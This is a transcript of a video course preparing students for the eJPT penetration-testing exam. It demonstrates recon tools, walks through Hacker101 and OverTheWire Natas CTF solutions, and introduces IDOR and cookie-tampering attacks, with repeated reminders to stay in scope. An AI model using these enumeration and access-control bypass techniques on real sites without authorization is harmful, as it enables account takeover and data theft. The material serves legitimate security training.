Hey, thanks for stopping by my channel. So this course is the complete eJPT preparation course. I have been getting some questions or some requests to put together a course for those of you who want to try for the eJPT. And this is what I think you'll need to know. It's pretty much everything I think you'll need to know in order to pass the eJPT and to get you ready and prepared for the eJPT. Now, after you finish this course, I would recommend you go through some more easy boxes on Hack the Box to make sure that you're really prepared and you're really ready, as well as know the port forwarding, because you're going to need to be able to reach an internal web server in order to pass the eJPT. And I have a section on that at the very end of this course, so you will need to practice that in order to pass the eJPT. Now, if I would have had a little more time, I would have added to the port forwarding, but YouTube limits the amount of time I'm allowed to put together in one video. So this video is as long as I can get it, with YouTube allowing me to still upload it. So videos like this take a lot of time for me to make. So if you would please like and leave a comment and subscribe, that would really help me with courses like this. They take a lot of time to put together, and I hope they are beneficial for you. So if you want to go ahead and skip through to whatever part of this course that you're really interested in, you can go ahead and do that. But I would recommend going through the complete course before you sign up for the eJPT, to give you the best shot at passing the eJPT. Now, a little bit of a disclaimer. It has been a really long time since I've taken the eJPT, so I developed this course to prepare you for what I remember being on the eJPT. So if there's something on the eJPT that's not included in this video, when you take it, you can let me know and I can update this course. So let's go ahead and jump into it, and thanks for watching. Okay, one more update. If you have gone through my complete one more update. If you've gone through my bug bounty course, then the first half of this is all about attacking web applications and the basics of web application enumeration as well as exploits. So if you've gone through that course, you can go ahead and skip forward to about the halfway point. There's going to be a section called network enumeration. So if you've gone through the bug bounty course, I'll go ahead and see you at the network enumeration. All right, in this video, we're going to cover a tool that is called Dig, and it will check for zone transfers. You're going to hear about zone transfers. It is a great way to find additional subdomains. You can use FUF and GoBuster and WFuzz and try and brute force for subdomains and use sublister, but you can also use Dig. It's really quick, and if there are any subdomains, it's really helpful tool because you'll find them right away. So a DNS zone transfer is supposed to replicate a DNS database between DNS servers, which means if it is vulnerable to a zone transfer, it will give us information like subdomains and some other information, which we'll see in just a second. So we'll go ahead and run this. I have opened up the box friend zone from Hack the Box because it is vulnerable to a zone transfer. And if you find a bug bounty program that's vulnerable to a zone transfer, you're not actually able to exploit it and hack per se the web application. But when you find a zone transfer and something is vulnerable to a zone transfer, you can report it as information disclosure because it's something that should not be open to the world. So the easy way to test this is with a tool called Dig, and we'll just type in Dig. So we'll go dig AXFR, and then we will say @ and then we're going to use the IP address, and then we'll use friend zone because that is the domain that we are after, .red, and then we can run this and see what it spits out for us. We have friend zone, and administrator 1. So this would be something that would be worth checking out. We have this HR. We have an uploads, which would also be something worth checking out if you're doing a CTF or if you find this information out in the wild. And so you can actually save all of this into an out file, and we'll just call it zone, just like this. And then from other recon that is done on this box, you also find another domain called friendzone portal, just like this, and we can run it, and we find admin, files, imports, VPN, and you have all of these files as well. And so if you double caret, it will just append to our file. So if we cat out zone, we have all of this information. And now if you have taken my little bash course, you know that we can cat out the zone, and we can go like this, and we can say grep friend zone and make sure that works. And so it'll point out, it'll give us all everywhere that friend zone is located. And then we can say grep in, and then we want to awk for our cut, and go ahead and put in our curly braces and quotes, and we can say print $1 because we only want what is at the front of this file. And then we will see what happens. Yep, that's what I thought was going to happen. It gives us what we want, and then we can say sort -u, and this should get rid of our replications right here, and it does. It sorts it out for us, and we get rid of a lot of the repeats. And now you have this nice little happy file with just the subdomains that we have pulled down from the zone transfer. So zone transfer is something you should always look at. And if you're in a Hack the Box, you might have to add more of these to your Etsy host file. But out in the wild, these would be really good targets to go ahead and try to attack and find exploits on. So this is the zone transfer with the dig tool. You'll want to remember it whenever you see a port 53 that is open. That is the port that is used for a zone transfer. So a few things to remember about this specific tool. If you run an nmap scan, port 53, if it's open, you can always try for a zone transfer and see if you can pull down additional subdomains. It's a great place to grab subdomains. You can also report it as information disclosure if you are actually able to pull off a zone transfer. So with that, we will move on to the next tool. Okay, we are going to be looking at some vulnerability scanners. There are several that will be really helpful to you as we go along. I think I'm going to add more scanners to this section of the course. But for now, I'm going to use just the most popular ones that you're going to be able to use within bug bounty programs and CTFs. So one of the most popular ones that you're going to see, especially with web applications, is going to be Nikto, and you can run it. It's pretty simple. You just type in Nikto. It should be installed on Kali Linux already. Nikto-H, and then the IP address that you will be attacking, and it will automatically start running. If you ever do any kind of certification, I think Nikto is allowed on all certifications, and some certifications I know it will actually pull up the vulnerabilities for you. So all you have to do is run Nikto and then read it. Nikto runs on web applications. It searches for different exploits within a web application. So if there's no web app, Nikto is kind of worthless to you. But there are other scanners out there that will go out and enumerate ports for you, such as Nessus. But this is one tool that you won't be able to use in a bug bounty program, and you're probably not going to use it in a penetration test unless you are wanting to get busted by the blue team. So we'll cover that tool in another video. But this is Nikto, and make sure when you run any of these scanners to read all of the output, because sometimes there will be little nuggets of information hidden within here. So one of the problems I used to really struggle with is just skimming the output of the scanners, and sometimes I would pass over information that was valuable. So like this right here, it tells us the Apache version that is running is out of date. So with this scanner, one of the things we would want to do is go and look to see if this Apache version is vulnerable and if it has been patched. So this is Nikto. It will give you some information that will be helpful for you to check out. I'm going to go ahead and pause this video and we'll move on to the next tool. So this is kind of the last Recon tool that we're going to be looking at in this section. It is going to be Shodan.io. You're going to hear about this. This one is really popular because it is the search engine for everything. Now, if you make an account and sign up, there is a lot that you can access. Like you can actually look through webcams that are online. You can just type into the search engine webcams and look at webcams all over throughout the world. You can see traffic light webcams. There's just a whole lot of stuff you can do with Shodan. But for just the basic usage, I just want to show you, like if we were to look at Yahoo and we hit enter and we let this load, it's going to give us back header responses. So you can look at these header responses And as I was scrolling through here earlier, I saw some things that I thought was pretty interesting. But you can make sure if you do use this and you type in Yahoo that these IP addresses are actually in scope if you're a bug bounty hunter, because some of this might not be in scope for you. So if you type in Yahoo, and let's try yahoo.com and see what comes back. I think it's probably going to be the same. Okay, and here it comes back. You can look through some of this information. It is pretty interesting what you'll find. I have found some stuff on here that is pretty sketchy that definitely should not be listed publicly. So Shodan just goes and crawls all of the internet and collects everything it can and all the information on all different IP addresses. And here is where you can access that information. You will for sure find it helpful in the future. Like I said, I have found information like basic information disclosures that you would not want on the internet by looking up targets on Shodan. So it's definitely one to check out, and you can play around with it. As you learn more in the world of cybersecurity, a lot of the stuff you're going to see on Shodan is going to start to make more sense. I'm not going to break down what everything is right now and all the header responses and all the information that Shodan provides for you, but you can go look at it, and as you get better, all this will start to make more sense to you, and the responses and what you see will be second nature, and you won't have to be Googling what different things are. Another tool that would be worth your time investigating is the Harvester. It looks like this, and this tool will go out and look for other domains and subdomains, and it will also find email addresses if you're a penetration tester for you to try and target. And the usage is really pretty simple. You just type in the Harvester, and then you would pass in a domain with the -d, and then you can pass in the source that you want to look for something. So you would just use domain.com, and then let's say we wanted to use Google, you can put in a -b and then google.com or any of these other options down here for the source, and it will go out and it will try to look for domains, and it will scrape all of these search engines for subdomains, email addresses, and things of that nature. So the Harvester is a penetration testing tool that you're going to hear about from time to time, and it's one to be aware of and know that it exists. You're probably not going to use it in any pursuit of certifications or CTFs, but it is a really great recon tool and one you should know about and be aware of. All right, I want to cover two more tools that are recon tools that you're going to hear about, but I don't really use a whole lot because I don't think I get a whole lot of helpful information from, but you're going to see these in pretty much every penetration testing textbook, every certification course you ever come in contact with, and they are Whois and NSLookup. We'll do NSLookup real quick because it doesn't give us back a whole lot of information, so we can just type in NSLookup just like this, and then you can do something like www.google.com, and it's going to tell you their IP address, the domain name. You're going to get the IPv6 name back, and it's going through port 53, and so this is a tool you would run if you see port 53 open, same as dig, and you can get just a little bit of information back with NSLookup. So you'll hear about this and you will definitely see it in the future. This is what it does, but then there's another one that you're going to hear about and see regularly, and it's Whois. And so if you type in Whois google.com, you're going to get back a whole bunch of information. And if you're ever doing like a penetration test, this is actually a good one to run because sometimes you can get back email addresses and a phone number and things like that about the company, but you can find out a little bit more about the company. So right here you see they're using the Google domain servers right here, which isn't that surprising being from Google. But if you look at this right here, Whois Google registered with, it's not even registered with Google domains, which is kind of ironic that Google does not have their own domain name registered with themselves. I'm guessing they must trust this Mark Monitor more with security than they trust themselves, which I mean is saying something. I think Google should probably switch that. But anyway, if you know why they're using Mark Monitor instead of Google domain names, then you can feel free to let me know in the comments. Maybe they're just using it just because they've never changed it once Google domains came out. Anyway, this is who is, and it just tells you more information about the domain name and where it's registered and the kind of the security behind it and who's running it, and you can look up to see if there's any vulnerabilities or anything like that. You're probably not going to find a whole lot from who is other than just about the domain name, where it's registered, who's it registered with, an IP address, and basic information like that. So these are two tools that you're going to hear about for sure in the future and would be worth remembering, but I don't use them all that much because I don't find them to be that helpful. I wanted to let you know about them because you will see them and hear about them in the future, and now you know what they are and what they do. Another helpful tool that you're going to use, especially inside of CTFs, is WP Scan, and you're going to use this with WordPress sites. So I've gone ahead and opened up Hack the Box, and I have a tenant running here, and if you have a Hack the Box subscription and you're wanting to follow along, you will need to add tenant.htb to your Etsy host file, which I have already done. So the WP Scan tool is going to go out and look at all of the plugins on the WordPress site and see if any of them are vulnerable, if any of them are out of date. It's going to check the actual theme and see how old it is and how long it's been since it's had updates. And we can go ahead and check out WordPress Scan right here, the WP Scan -help, and it will tell us all of the different flags and everything that we are able to use. And one thing that I can never remember what it actually looks like is this right here, is the -- plugin detection. So what we will do is we'll type in WP scan --URL http / and then we're going to go tenant.htb, and then this -e right here is going to tell it that we want to check all of the plugins. I sometimes call it all ports out of habit, but I think it's all plugins. We can actually just look, if we scroll up, we're going to enumerate all plugins right here, and we want to use the -- and then we want plugins -detection, and then we want to use aggressive, and then you can do a -o if you want to save this in a file. I pretty much never do that. I'll just open a new tab and come back. Sometimes I'll have a whole bunch of tabs open up here and it's not always that helpful. So it will flag things like this and tell you that a version is out of date. And I told you this in the last video, but I especially am really bad with WP Scan because you get a lot of information, but you should read all the way through all of this. I remember doing a CTF about 6 months ago, and I ran a WP Scan and I just like skimmed through it, and I ended up missing a vulnerability that gave me remote code execution, and I wasted several hours of my time enumerating when I should have just read the entire scan. So make sure you read the entire scan when you run one. It might take you a little bit of extra time, but it will always be worth it because it will give you information even if you think it might not be helpful. Like right here, it doesn't flag this, but it might be worth going out and checking this version 5.6. It's insecure on this specific release, and you can go and check these different version numbers, and this might take a little while because we're running the aggressive, but that is okay. So this is WP Scan. You're going to want to run this whenever you come across WordPress web applications. It is going to be your friend. You're going to use it regularly throughout your penetration testing career, especially in the world of CTFs. And always remember, read the output. Okay, so here we are. We have opened up a terminal, and you're going to go ahead and sudo apt update, and then you're going to type in sudo apt install sublister. And I just want to show you sublister because it's really popular, and I used to use it a lot, but I've really stopped recently because it's not pulling down as many domains as I would like. So if we just type in something like sublister and then yahoo.com, we'll see what it pulls down. So you'll type in sublister -d for the domain. Actually, we can type in a -h for help, and you can see what all it's able to do. So we're going to type in a sublister -d, and then we'll just type in yahoo.com, and it's going to go out and search all these different search engines and then bring back the results. And remember, when you see all of these subdomains that it brings back, that you need to check to make sure they're in scope. Sometimes I'll show you what I do is I just open this up and I'll be like, okay, here's a subdomain, and let's go through these subdomains, and I'll show you what I think is the best way to do this. So if you're in Firefox, you're going to want to download something called Open List plugin, and we want it on Firefox. So we'll just go ahead and add this, and it's telling you right here what this is going to do. It's going to open multiple URLs at a time, which becomes really helpful for us. It says we want to add, we're okay with adding, and here it is. So we now have this right here, and what OpenList does is when you have all of these subdomains and you want to see what happens, you can just copy these and then you can paste them in. So we'll just grab this one because I don't think it's going to have anything on it, so we'll copy this one. We can come over to OpenList and we can just paste in a bunch of URLs. So what we would do is you'd really just copy a bunch of these instead of the same one over and over. And then when you hit open URLs, it's going to open all of these tabs for you. It's going to be a lot faster than having to open one at a time. So here they are. It opened all of those for us. So that's one way to check out the subdomains you do find, but that's not the purpose of this video. That was kind of just an afterthought that popped in my head as we were shooting this video. So you have sublister, and here's a list of subdomains that it's brought down, and you might be able to say, well, that's a decent sized list. So we'll scroll through it here. It's fine, but it's not as big as we would like. So one of the tools I've been using here recently is AMAS, and you can just type in AMAS-H and you can see exactly what it does, and it's going to tell you it's an in-depth attack surface mapping and asset directory. AMAS is really cool if you can get it to work. So sometimes AMAS can be a little bit finicky, but it'll work for us for what we're about to do. You just type in AMAS, and then we want to use enum because we're going to do enumeration right here. And then if you hit a dash, if you just hit enter with AMAS enum, it'll tell you everything you can do with the enumeration. And we're actually going to scroll up, and we're going to run a -d, and we're just going to give it a domain. And sometimes I like to run a -IP to grab the IP addresses for the discovered names, which can be really helpful. So we're just going to run AMAS enum -d, and then we'll just run yahoo.com. Actually, now that I see this is running and it's actually taking a little while, let's go ahead and close out of this. I want to run an AMAS enumeration, and I want to run a dash passive, and then the domain right here, and then run this, and this should run a little bit faster than what we did have going. Okay, so AMAS is still running, but I want to show you, look at all of these subdomains that it has pulled down for us. This is going to be way more. It's so many that my terminal is actually lagging. So we'll go ahead and close out of this so that way it stops. And if we just scroll through here, look at all of these subdomains. This has way more subdomains than we had with sublister. It is an insane amount. So all of these subdomains, you'll want to check to make sure that they're in scope, but look at all of these Yahoos. Like, this is a crazy attack surface. If you can find a program that has a really wide scope, then most of the subdomains you find will be in scope, but make sure to always check. I can't believe I'm still scrolling. There has got to be like nearly 1,000 subdomains right there. So AMAS is something you'll want to check out. I love AMAS enum, and then I run the passive because I think it runs a little faster, and then Yahoo. Okay, we are going to be starting our URL portion of this course, just what exactly we can learn from the URL, what we can do in the URL, which is actually quite a bit. If you have a programming background, you can feel free to skip over this lesson, as we're just basically going to be talking about what URL is and what we can look for. The URL is a basic understanding of the root domain, or just a domain that we can access, and as you access different parts of the site, you will be going into different directories, as we've already shown earlier, and you'll be navigating through files within the domain. And so the URL is actually something that you can learn about how the website functions. You can look sometimes, you can see information, personal information, sensitive data can be stored there. So for example, if in this URL it had like an ID of my name or my email address, those are things that you wouldn't necessarily want in a URL, or specifically if a password was in there. Those are things that you could actually report if you had sensitive data in there. But we're basically going to be looking at how we can manipulate the URL to our advantage and what we can do specifically with pages. So I remember when I first started down this path of wanting to learn web app pen testing, sometimes you'll go to a capture the flag website and it will be just a blank page. And I remember coming to the blank pages and thinking, oh my goodness, I have no idea what I'm supposed to do. But for you, we've already gone through the recon portion of this course, and you know to go to derb and just start looking for directories. And then also, we're going to be looking at the source code. I mentioned it briefly earlier, but it's something that can be really helpful, and I'll show you why. So I made this very, very basic HTML website. It's very basic. So if you're a developer, don't laugh too hard. And so if you just come here and you click and we go to a different page, you can see we have a button and you click it, nothing happens. And then we have another link and you click it and it just takes us back to the index.html, and we click it and we go back to page 1. These are things, what I'm about to show you, something that derb would probably find, but if it doesn't, you can kind of see how this is going to work. You can come in here and you can just go page 1, and then you can go, okay, well, if there's a page 1, is there a page 2? And then you hit enter. Oh, page 2 is blank. And then you go page 3. And then you hit enter, and we hit a forbidden page. And so if we have this forbidden page, there's something on it that we're not supposed to be able to access. Well, how can we get there? And this is when remembering looking at source code can be really helpful. And so we can come over here and we can go view page source. And you can look through and see just how basic this really is. And you can see that we have something hidden, and you can go, there is this directory or this file for more information. And so you can come here and you can copy this and you could paste it in up here. Another way to come across this is you can see that this is hidden. We're going to cover this in more detail as we go through the course. But as you go to the source page, one other thing that's really helpful to look through is to right click and just go inspect. And you can inspect what is on the page. So basically the same thing that we saw was the source, but you can see where this is hidden. Sometimes you will have login pages and there will be hidden fields that you can open up and try and manipulate. And you can just actually type this into text and it'll actually show up on the page as plain text. And so we have this file here. If you remember, we had page 3 was forbidden, and we're not able to enter into it. But we can try. This HTML actually won't be on any websites. I just didn't take the time to remove it. And so we'll ignore it and act like it isn't there. But if we remember from this right here, we have this edit 3, which I'm guessing is our page 3. And then we can hit enter. Well, I typed it in wrong. We have, I'll just copy paste it. Or, oh, I'm struggling. We can copy it. We can bring it up here and paste it in. And then this is the forbidden page where you can access files. Now, we're actually going to go and practice something very similar to this. And when you do this, what you're going to need to do is go to Google. I would encourage making a new Gmail account and then going and signing up on HackerOne. And then we're going to be using Hacker 101 to practice what we just saw, and for us to be able to gain some practice. It is a CTF, and so it's a place where you can go and practice some of the stuff we're learning. So you will see some of these very basic, boring, static websites that I'm making throughout this course just for the purpose of showing you the basic concept, because there are not a whole lot of places to practice your bug bounty skills and your web app pen testing skills. And so rather than me try and show you how to perform these on one of those practice sites, I decided it'd be easiest if I just gave you the basic concept of how it functions within a static site, and then I'll take you to places to practice, and I'll actually have them linked in the resources, so you can just click on the link and it'll take you to HackerOne so that you can create an account, and then also to take you to Hacker 101 where we are going to practice. In the next lesson, I'm going to show you exactly where we're going to practice and how to get started. So I'll see you in the next lesson. Okay, we are going to set up our HackerOne account. You can actually come into Google and type in Hacker 101. This is going to be their capture the flag practice area, and you can actually click this. And what will happen for you, I've already logged in, but what will happen for you is it's going to say, it'll bring you to a login page, and once you reach the login page, you will have to go and create your own web account and your own account with HackerOne. And once you create your account with HackerOne, you can navigate back to Google, type in Hacker 101, and then click on the Hacker CTF, and then it will bring you back to login. You will click the blue button, and then you will log in, and it will bring you to this page. And if it doesn't bring you to this page, you have a navigation bar very similar to this one, and you will just click on CTF, and then you will be at this page. But you're going to have to register in order to reach this page. And then what I want you to do as we begin working with actual vulnerable websites is go ahead and click go. This is going to be the very first challenge I have for you. Once it loads, you're going to be brought to this page, and the way HackerOne has set up their training program is that you will have flags, which is just it'll say flag, and then it'll have a bunch of random numbers. And once you reach that flag, you will know you have found the area of the website that you were not supposed to find or is supposed to be vulnerable. And so with that, I want to have you pause this video and see if what you've learned in the last lesson, you can figure out how to find the flag all on your own. So with that, pause the video and give that challenge a go. Okay, if you got it, that is great. If not, I'm going to go ahead and reveal to you how to find this specific flag. But before you do, I would challenge you to go back and watch the previous video and just see the steps that I walk through, and then go ahead and come back here and give it a try, because I am certain with what we have covered, you can find this flag on your own. So the way we find this very first flag is by coming in here and just right clicking and then going to view page source. And then we can look at the page source and we can see what is in here. And it has a background image. And then here it is, background.png. Just a little bit ago, actually came in here to try this, and my guess was this is going to be a file that we were not supposed to be able to access. And so copied this, came over and pasted at the end of our URL, paste and go. And I didn't make that, apparently didn't work for me. We're going to paste it and then hit enter. And then here is our flag. We're going to move on into the next video, and I'm going to help you get set up on what you're looking for, and then I'm going to turn you loose and see if you can find the next flag on your own. Okay, we are ready for challenge number 2. We are going to come into the first easy program we can enter. We're going to only find one of these 4 flags. We'll actually come back later. We're going to go ahead and click go and pull open this vulnerable website. And I'm going to turn you loose once this loads, because everything that we have done so far, that we have covered, should give you everything you need to know to find the flag that we're looking for in this specific capture the flag. And so with that, I want you to go ahead and click around in the website and see if you can find the flag. And so we can go ahead and pause the video now and see if you can solve the first challenge. I believe we've covered most everything you need to know to find this flag. And so the first thing that we would do is just start clicking around, and you could maybe make a page and see what happens. We've got a page here. We're on page 9. And so we can go back, we can edit this page, and we can see we can edit our page 9. We can go back, we can click on the markdown test and click the button that doesn't really do anything. Can come in and view the page source. And we can look around. There's not really a whole lot here for us. And so we can go back and we can go to home. We can go to testing, and just as we continue to click around, a couple of things that stand out to me in our URL is that we have this page. So we can come into, let's just go into the page that we created. We can come in here and just go page 1, page 2, page 3, not found. Well, we know there has to be at least 9 because we have created page 9. So we'll go to 4, 5, and then we hit the forbidden page. If you remember in the example that I showed earlier, we have seen a forbidden page before, and then we'll keep going. We'll go all the way up to page 9 and look at every single one, every single option we have, because we know that's how far we are as we've created. So we have all of these, and then page 9 should be the one we created. So what page was that was forbidden? It was page 5. So how do we access this? We can go view page source. It says we don't have permission, and it is forbidden. Well, there is another way to view this page. If you remember from the example website that I made and showed earlier, you would know that we can try and get around this because we have the option to edit this page. And so if we edit this page and we know we can edit the page that we made, maybe we can edit the page that was forbidden. So we can come in here and put in 5, and there it is. There's the flag. So I hope you found this. I think by now we've covered everything needed to find a flag like this in the URL. I have a few more challenges for us to go ahead and try. They're going to be on a website called Over the Wire, and I will actually help you navigate to that page and get logged in. We don't actually have to make a user or create a user, which is very nice, and so it's very easy to access and to practice on. And so with that, I'll see you in the next video, and we'll get that all set up. Okay, we are ready for a few more challenges. And so we're going to go ahead and head over to website called Over the Wire, and you can click on it or type it in. And we're going to go ahead and click on Nodus. This is where we're going to be working out of. And we can click on that and it will pull it open. And this is where we're going to get started. I'm going to go ahead and open a new tab to keep this one open. So we're going to start on level 0. Password is going to be level 0. And so all we have to do is copy this URL and paste it in and then hit enter. And our password is going to be Nodus 0 and Nodus 0, and then we'll hit enter. And every time you find a new flag, and you will come up here and you will change the 0 to a 1, the 1 to a 2, the 2 to a 3, and it will prompt you and say username. And so we have Nodus 0 right now. The next username will be Nodus 1, and then the flag that you find will actually be your password for the next level. And so we have gone over everything needed to find this first flag, and I want you to go ahead and try and do that now. Okay, hopefully that went well for you and you were able to find the first flag. But before we get into that and get going too far, there's one thing I forgot to mention in the Recon portion of the course, something that we will use in Nodus and you will use later on in your bug bounty hunting career, is the robots.txt file. So you can have the way we get to that is you just hit a / and then you hit robots.txt and then you hit enter, and it will take you to a page. This one doesn't have one set up, but it'll take you to a page that doesn't allow search engines to find. And so sometimes websites will have files that they're hosting online that they don't want Google displaying. And so they'll have a disallow or allow for Google and Bing and Yahoo and other search engines to go through and crawl their website, and it will go through that robots.txt file and will say, do not allow Google or Bing or Yahoo to crawl through these files. And so it's always a good thing to check the robots.txt and roll through and see what's allowed and what's disallowed, and then visit those disallowed files and see what's in there, or those domains or directories that we find. And so with that, we'll go ahead and solve this challenge. And so I hope by now you know one of the first things we do is to go ahead and view the page source, or you can inspect the element. Either one works. I like to view the page source because it gives us a more complete view. And so one thing I want to mention about the Nodus levels is everything inside this head tag, which will be from here to here, doesn't have anything to do with the level. And so sometimes you'll see the password for the previous level up here, which the next one would be right here. This is our password for this challenge. And so I hope you found this. And next time, if you view the page source, this password will be right here. And just so you know, it's inside the head tag. And so it's not actually anything that's going to be relevant to us. And so here's the password for the next level. So you can go ahead and copy this. And the way we get to the next level, if you remember, is come up here, go to Nodus, change this to 1. It will prompt us for the username, which is going to be Nodus1, and then our password, which we just found in that flag, and we hit enter, and that takes us to the next level. And if you want to go ahead and try and solve this challenge, you can do that now. I'm going to stop this video, and we will solve this challenge in the next lesson. And so this one says that we are not allowed to right click. It's been blocked. However, for me, if I go ahead and I use my keyboard to right click, if I hold down Control and hit the right click or click, then it works for me. And so my right click is available through using Control, and then I do the exact same thing. I go to view page source. And then once in here, we can look through our code, and then they've got it commented out. The password for Nodus2 is, and then here's our password. Now this may seem really easy, but you will actually find people who have put in these comments in the code of a username or a password or an API key, and they just have forgotten to delete it. So they'll put them in here while they're developing the site, or while they're writing their code, and they need to remember their username, their passwords, their APIs, other sensitive information, and you will actually come across it just being hard-coded right onto the site. And so that's why we check the code, and sometimes you will find you will really find something just like this, a username and a password. These seem very easy, but they're also very practical, and they're something you will come across pretty regularly. And so I guess I shouldn't say pretty regularly. You will come across them. Most people will have already reported these. This is why it's important to be one of the first ones on a site to pick a specific target and make sure you keep up to date with what's coming out new on different domains and different subdomains as you continue to work through different programs and your bug bounty hunting. So we'll go ahead and copy this password. We'll come back to our main site. We'll type in Nodus2, and we will type in Nodus2 and paste our password. I'm going to not save this. And then here we are again. It says there's nothing on this page. That should give us a clue. Everything we need to know to solve this challenge, we have already covered previously. I think there's a little more to it that will cause us to need our critical thinking skills, but we have covered everything needed to solve this challenge. And so I'm going to go ahead and give this a go, and we'll go over the solution in the next video. Okay, how did that go? Hopefully you were able to solve this challenge. I'm actually going to show us a couple different ways that we could solve this challenge, just so that we have a more rounded understanding of how the URL works and how different files and different directories are included into domains. And so with that, I think by now you probably know what we're going to do. We're going to go ahead and right click. We're going to view the page source, and we see here's where it says there is nothing on this page. And so we can look through everything in the header, doesn't matter, isn't relevant to us. And so all that's left is this image, and then we have a link. And so what we can do is we can go ahead and copy this, and we're going to paste it into our URL. And so as we paste this, we can go ahead and hit enter and see where it takes us. And when I first solved this, I went right here, I saw this, and I went and I checked to see if I could inspect the element to see if there was anything else on this page other than this picture, or maybe there was something inside of it that would help us. And when I was looking here at the URL, I noticed that this is a file or an image, and it's inside of a directory called files. Now, if you remember, we can actually go back directories, and you can actually just delete the pixel.png, and it will take you to the previous directory, and here it is. Or we can go back, and just another way to see this is you can do just like we learned in our home folder or in our Kali Linux terminal. You can have your slash, and you can go .. slash, and you can hit enter, and that will take us back one file or one directory. And so we've already viewed the pixel, and now we've been in the parent directory, but now we can see this users.txt. And so we can click this, and it'll take us into a new file. and here's usernames and passwords. And so you have Alice, Bob, Charlie, and then here's Nodis3. So this would be our username, and here is our password for the next challenge. And so we've seen all of this before. We have seen that we can find in our source code things that don't show up, or hidden files or hidden images. And so we've seen this before. So I hope that you would have copied this and have pasted it. And we've also seen what's called the directory traversal, going back or deleting and moving into different files and different directories. And so I hope that you were able to solve this challenge. And so we'll go ahead and get set up for the next challenge. And so we can come back to our original page. Go ahead and type in Nodis3. Type in our username, paste in our password, and click. I'm going to not save it. You can save it if you want. And then it says there is nothing on this page. And so this is the same as we have just found. I'm going to go ahead and turn you loose and see if you can solve this challenge. Okay, in the next few videos, we're going to be going through a couple of different PowerPoints. The reason for this is I think it's really helpful for us to have some kind of foundation before we begin looking at examples. I think by the time we get through the PowerPoints, you're going to be a little confused and probably still not know what exactly we're looking for or what's going on. But my hope is that with the PowerPoints and then just a couple of examples, you'll be able to start finding some of these bugs on your own. And we're going to be practicing on Hacker 101 as well as Juice Shop, which we just downloaded. And we're going to be looking at how to use burp before we begin looking at trying to exploit some of these vulnerabilities. I think that you will be using burp a lot, and so it'll be helpful to go through and kind of look at how it works and explore just a couple of its functionalities before we begin our exploitation of some of these vulnerabilities. And so we're going to be looking at IDORs, business logic errors, and we are also going to be looking at manipulating user input and cookies and tokens as well as we continue in this course. And so we're going to begin by looking at insecure direct object reference. These are called IDORs. That really doesn't tell us a whole lot, but they're really simple to understand once we get going. And so these IDORs are going to be just parameters that we can change, so that we can bypass specific functions on a web app. With IDORs or business logic errors, you can bypass payment options, you can reverse payment options so that you're the one getting paid, you can put things into other people's carts. There's a lot of different ways you can use IDORs, and when you're out hunting on your own, you're going to have to be creative because there are many different ways that you can exploit IDORs. You can skip login pages, you can access someone else's account. I personally, one of the first bugs I ever found was being able to write on someone else's social media platforms. It was actually just one platform. And there was just one specific area of the web app where I was able to change an ID and write on someone else's wall of their news feed. And so that is an example of an IDOR. You can also leave feedback on someone else's under someone else's name. You can edit another person's blog or their post. And so these are just examples of IDORs and different ways that you are going to be able to find them. And IDORs and business logic errors are going to be the most common bugs out there, which is a great thing because it makes it easier for us to find them, and they are easy to find as well. And so these are something I think we should learn very well. And we are going to have a significant amount of time to practice these because there's actually a lot of different areas and ways to practice these, especially in Juice Shop, which we just downloaded. The best way to test for these, and I think the only way, is by creating two different accounts. It is always good to create two different accounts because you will have to test in real life against your own accounts. You cannot test on someone else's account. So you can't write actually on someone else's wall. This would be out of scope, or you can't leave feedback as a different user. These will always be out of scope. You don't want to ever mess with the functionality of the application or the people who use it. You will only use your own accounts to test against, and it also makes it easier to use your own account because you already have a second ID number that you can use on your attacker account. So you'll have an attacker account and a victim account that you will use, and so you don't want to test on someone else's account. An example, or a simple example to remember, is to look for hidden inputs. You'll actually see this as well in Burp. When you create an account, it won't say input type hidden, but you will see such as a name and your username, and it will say, are you an admin? And then it'll say value no. An easy way to show one of these errors is just to change this value to yes or true, and you will automatically have admin privileges. And we're actually going to be able to test this out in Juice Shop, something just like this. So you'll get to see this in action. And so we're always looking for parameters and things that we can change to get us somewhere that we should not be. And one of the other places that you will find iDoors is in cookies. A lot of times cookies and tokens will host user information. So that's how websites will keep you authenticated. Not all of them, but some of them will be through cookies. And so you will have inside cookies, maybe you'll see something in your cookie like user ID and then a number. And you can change the number to something else to see if you can access that account. For example, if you had two accounts, you would take the user ID of your victim account and you would replace it on your attacker account and see if you can access parts of that application that you shouldn't under another user. If you were getting malicious with this, you would change the value to 0 or 1 and see if you could gain admin privileges to the web app. And another way to test for this is to see if you can log in, save your cookies first or your tokens, and then log out, and then see if you can log in and delete your previous cookies or tokens and then repaste in your new ones and see if they have been terminated or ended. If they haven't, this would be a logic error because when the session has ended, so should the cookies or tokens. And so you can see what to manipulate and where you can manipulate different things within cookies and tokens as well. These aren't specifically iDoors, but they're similar. They're similar enough that I think they can be included together. And so when we're testing, we're going to be using Burp. This is going to be where we're at the most. Sometimes you will be able to see these in a URL. For example, if we have this example here, www.website.com, and let's say you have an invoice, you just purchased something, and it says your invoice number is 12. In a URL, you can just change this 12 to an 11 and see if you can access another customer's invoice. And if you could, this would be a sensitive information disclosure. It's something you shouldn't be able to access. And that would be a simple iDoor. I think they're easier to test for in Burp because it's all laid out for us, as we'll see in the coming videos. And so also another example would be you can upload images or resumes. Like on Indeed, you can upload a resume. And you can see in the URL, if you pull your resume, so let's pretend this is Indeed, and it says www.indeed.com, and then it's got a slash, and it says resume equals 87, and that's your resume. You could change this and see if you could access someone else's image or resume just like you would have with the invoice, and see what you can access. But remember, out in the wild, we are testing our own accounts. And so I actually have an example here for us. I pulled off of HackerOne of an IDOR that somebody actually has found. And so we'll walk through exactly how he pulled this off. And so he goes to the website, remember, creating two accounts. He has a victim, logs in as the victim. He creates a blog on the site. He saves it. And then what he ends up doing is going into the victim account or the attacker account, and he does the same thing, makes the blog. And then from there, he clicks the save button and then goes to the edit user profile and saves it, opens up Burp. And then what happens is he can change the ID with the victim's ID. And this would be a clear IDOR accessing something that you shouldn't be able to. And we've seen things similar to this with the URLs earlier in changing URLs. And then he forwards the request to go to the victim's account and the website information. And you can see that it has changed. And so this is an example of an IDOR. I think we'll be able to make this sound a whole lot easier once we're actually walking through them. And so I want to go and talk a little bit more about cookies and the URL and what exactly we can do with them. Then we're going to look at how to use Burp to find IDORs. And then I want to turn you loose and let you try and find an IDOR on your own. So I'll see you in the next video. Okay, in this video, we're going to talk about a little more about URLs and what we can do with them, cookies and tokens, and then we're going to look at something called CyberChef, and then we'll move into Burp and exactly how it is going to help us in its functionality. But before we get there, I was talking with my wife and I just said, hey, I think I'm going to have to warn all of the students that my PowerPoints 